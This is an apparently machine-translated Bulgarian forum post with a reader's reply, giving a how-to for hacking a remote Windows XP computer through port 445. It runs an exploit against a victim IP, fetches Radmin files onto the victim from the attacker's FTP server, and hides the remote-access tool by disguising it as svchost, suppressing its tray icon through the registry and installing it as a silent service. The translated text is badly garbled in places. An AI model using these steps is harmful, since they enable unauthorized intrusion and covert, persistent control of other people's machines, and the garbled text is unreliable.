Дистанционно хакерски компютър чрез порт 445

Сега се грижи за собствената си анонимност, сложи прог VMWare (кой знае в него, обясни същността на работата - монтаж и пускане в експлоатация друг гост, операционни системи от активна в момента, така че можете да настроите виртуалната операционна система да работи в локалната мрежа, с него ще имат IP, така че вашата основна къде да свети), но ако не ви е страх, че сте премине на чичо огромен, почистете лицето на предполагаемото инцидента formatnut винт, не използвайте =)

На следващо място, отворете DOS емулация, колкото 2 прозореца, ще бъде от един в атака с друг културен konekt телнет порт на жертвата;) ако телнет ужасно, да вземе Pyuti на същото място.

Start - Run: CMD
Window доса: (да речем eksploit pereymenuvali в EXPL, защо толкова дълго име за нас, докато не намерите всички букви от CLAVE да отбележи какво прави и се слага в C: \ Temp)

C: \ Temp \ Expl 666 0 123.456.789.666 (ние натиснете Enter) след 0 означава, че оста е в Windows XP Pro жертва, 123.456.789.666 IP жертва отваря порт 666 за Telnet, ако видим Hanging прозорец, както ще се случи, тогава всичко е наред = ) (не забравяйте, IP състои от 4 байта, т.е. 0-255,0-255,0-255,0-255, в този пример, използването на грешен IP лични причини)
[*] Цел: IP: 123.456.789.666: ОС Windows XP Professional ... [*] Свързване с 123.456.789.666:445 ... ОК [*] Атакуването ... ОК

CD - отидете в каталога;
получите - свалите файла от сървъра;
слагам - свалите файла на сървъра,
управление на файлове, да попълните и люлка чрез връзка Telnet, по възможност двоичен, в противен случай файловете ще бъдат не започне, сваляне на файлове от директорията на FTP, където сме сега, пример за: (\ входящо \ музика \ dethmetall \ I_hask_you_dear_lamer - това е нашата тайна директория е все още много важна точка от FTP трябва да имат достъп до една от директориите за протокола, ако не, търсите дадена програма и да дадете своя FTP)

Качване на файлове на сървъра, отворете DOS-емулсия, след това:

FTP -А 123.456.789.101
CD входящо
CD музика
CD dethmetall
CD I_xask_you_dear_lamer (сега сме на тайно място, попълнете тук)
двоичен (двоично копие (!) режим)
сложи r_server.exe
сложи raddrv.dll
поставени AdmDll.dll (сега файловете на FTP)
чао (продукция FTP)
Сега стигаме до един и същи ток телнет:
FTP -А 123.456.789.101
CD входящо
CD музика
CD dethmetall
CD I_xask_you_dear_lamer (сега сме в тайна папка)
LS (проверете дали нашите файлове са там)
r_server.exe
raddrv.dll
AdmDll.dll (добре, и трите файлове са налични)
GET r_server.exe
GET raddrv.dll
получите AdmDll.dll (файлове са вече на "враг машината")
чао (оставете FTP)
(Когато роботът с FTP буквите е от значение, файловете се копират в директорията, от която ние отидохме на FTP, в този случай \ System32 \) продължи да работи за укриване Radmin от нашите потребители, а след това той ще бъде по-умен от предположихме (никога не подценявайте ( !)).

Ние работим с регистъра

Ние сме в телнет връзка с атаката и пише: REG ADD v2.0 \ сървър \ Параметри HKLM \ System \ Radmin \ / о DisableTrayIcon / т Reg_binary / г 01000000 (тази опция скрива zanachek Radmin тава)

Сега работя с този процес, ако я пускате Radmin сървър, вие ще видите нещо неприятно, процесът r_server там, но около 5 svchost.exe процеси, които няма да са забележими, ако те ще бъдат 6, за тази цел само команда преименуване: REN r_server.exe Svchost .exe.exe (прикрито) сега е в телнет напише: svchost.exe.exe / премине: lamer_nash / порт: 666 / инсталиране / запазване / мълчание (мине ключ - парола за konekt;
порт - порт промяна по своя преценка:
инсталиране - За да инсталирате услугата като;
спаси - сега тези параметри са двете umolchatiyu;
мълчание - без изкачвания на прозорец с компрометирана машина "Настройки Запазено")
Сега стартирайте командата към сървъра
svchost.exe.exe / старт
изчакайте системата за храносмилане, че от това искате, зависи от това atakovany потребител стартира с вашата машина Radmin клиент radmin.exe и се свързва с 123456789666: 666 Сега ние винаги ще бъде в ръцете на компютъра, ние също са инсталирани Radmin като услуга на тези, juzverej стига това да не стане по-интелигентен, или да намерят друг по-интелигентни, или Уинду 10 зелени долара някой, че не пренаредите =). Положителен момент: 10-13% от тях имат защита и те не са счупени инструменти, той е щастлив, струва си да се има предвид, че е необходимо fairvol и антивирусна или не, след като прочетете този материал.

Здравейте.
Следвайки инструкциите, да стигна до cmog съобщения в телнет прозорец: "Връзката към машината губи." никога zakonnektivshis.
Ckompilirovanny eksploit Свалих съобщение *] Цел: IP: 123.456.789.666: ОС Windows XP Professional ... [*] Свързване с 123.456.789.666:445 ... ОК [*] Атакуването ... OK-получите
до "под атака" не издържам PC anivirusa и не faeyrvola.
Помогнете моля разбере.
Фиксирана бъг, може би вече?

__________________
[COLOR = "Purple"] [B] [I] [U] по-добро откриване на ума си в мълчание, отколкото в разговорите. [/ U] [/ I] [/ B] [/ COLOR]